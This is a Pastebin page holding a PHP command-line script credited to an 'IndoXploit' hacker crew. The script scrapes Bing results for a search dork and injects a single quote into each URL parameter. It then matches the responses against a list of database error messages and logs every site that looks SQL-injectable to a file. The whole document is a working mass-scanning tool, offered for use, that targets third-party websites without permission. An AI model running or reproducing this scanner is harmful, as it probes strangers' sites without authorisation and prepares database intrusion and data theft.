AgusSR

SQL Dork Scanner via Bing Dorker [ CLI ]

Oct 29th, 2016
3,505
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. // SQL Scanner via Bing Dorker
  3. // Coded by Mr. Error 404 ( l0c4lh34rtz) - IndoXploit
  4. // Greetz: Sanjungan Jiwa - Jancok Sec - Res7ock Crew
  5. // usage: php sql.php 'bing_dorker'
  6. // ex: php sql.php '"page.php?id=1" site:it'
  7.  
  8. set_time_limit(0);
  9. error_reporting(0);
  10. @ini_set('memory_limit', '64M');
  11. @header('Content-Type: text/html; charset=UTF-8');
  12.  
  13. function cover() {
  14.     print " ******        SQL Scanner via Bing Dorker         ******\n";
  15.     print " *****      Coded by l0c4lh34rtz - IndoXploit       *****\n";
  16.     print " ****  Sanjungan Jiwa - Jancok Sec - Res7ock Crew    ****\n";
  17.     print " ***          usage: php sql.php 'bing_dork'          ***\n";
  18.     print " **    ex: php sql.php '\"page.php?id=1\" site:it'       **\n\n";
  19. }
  20. $error[] = 'You have an error in your SQL';
  21. $error[] = 'supplied argument is not a valid MySQL result resource in';
  22. $error[] = 'Division by zero in';
  23. $error[] = 'Call to a member function';
  24. $error[] = 'Microsoft JET Database';
  25. $error[] = 'ODBC Microsoft Access Driver';
  26. $error[] = 'Microsoft OLE DB Provider for SQL Server';
  27. $error[] = 'Unclosed quotation mark';
  28. $error[] = 'Microsoft OLE DB Provider for Oracle';
  29. $error[] = 'Incorrect syntax near';
  30. $error[] = 'SQL query failed';
  31. $error[] = 'Warning: filesize()';
  32. $error[] = 'Warning: preg_match()';
  33. $error[] = 'Warning: array_merge()';
  34. $error[] = 'Warning: mysql_query()';
  35. $error[] = 'Warning: mysql_num_rows()';
  36. $error[] = 'Warning: session_start()';
  37. $error[] = 'Warning: getimagesize()';
  38. $error[] = 'Warning: mysql_fetch_array()';
  39. $error[] = 'Warning: mysql_fetch_assoc()';
  40. $error[] = 'Warning: is_writable()';
  41. $error[] = 'Warning: Unknown()';
  42. $error[] = 'Warning: mysql_result()';
  43. $error[] = 'Warning: pg_exec()';
  44. $error[] = 'Warning: require()';
  45.  
  46. function getsource($url) {
  47.     $curl = curl_init($url);
  48.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  49.     $content = curl_exec($curl);
  50.     curl_close($curl);
  51.     return $content;
  52. }
  53. function inject($url) {
  54.     $data = getsource(str_replace("=", "='", $url));
  55.     $errors = implode("|", $GLOBALS['error']);
  56.     return preg_match("#{$errors}#i", $data);
  57. }
  58. function simpen($isi) {
  59.     $f = fopen("result_sql.txt","a+");
  60.     fwrite($f, "$isi\n");
  61.     fclose($f);
  62. }
  63.  
  64. $do = urlencode($argv[1]);
  65. if(isset($argv[1])) {
  66.     cover();
  67.     $npage = 1;
  68.     $npages = 30000;
  69.     $allLinks = array();
  70.     $lll = array();
  71.     while($npage <= $npages) {
  72.         $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
  73.         if($x) {
  74.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  75.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  76.             $npage = $npage + 10;
  77.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  78.         } else break;
  79.     }
  80.     foreach($allLinks as $url) {
  81.         $urls = parse_url($url, PHP_URL_HOST);
  82.         $urls = "http://$urls/";
  83.         if($_SESSION[$urls]) {
  84.             //
  85.         } else {
  86.             $_SESSION[$urls] = "1";
  87.             if(inject($url)) {
  88.                 print " $url -> Vuln!!\n";
  89.                 simpen($url);
  90.             }
  91.         }
  92.     }
  93. } else {
  94.     print "usage: php ".$argv[0]." 'bing_dork'\n";
  95.     print "ex: php ".$argv[0]." '\"page.php?id=1\" site:it'\n";
  96. }
  97. ?>
RAW Paste Data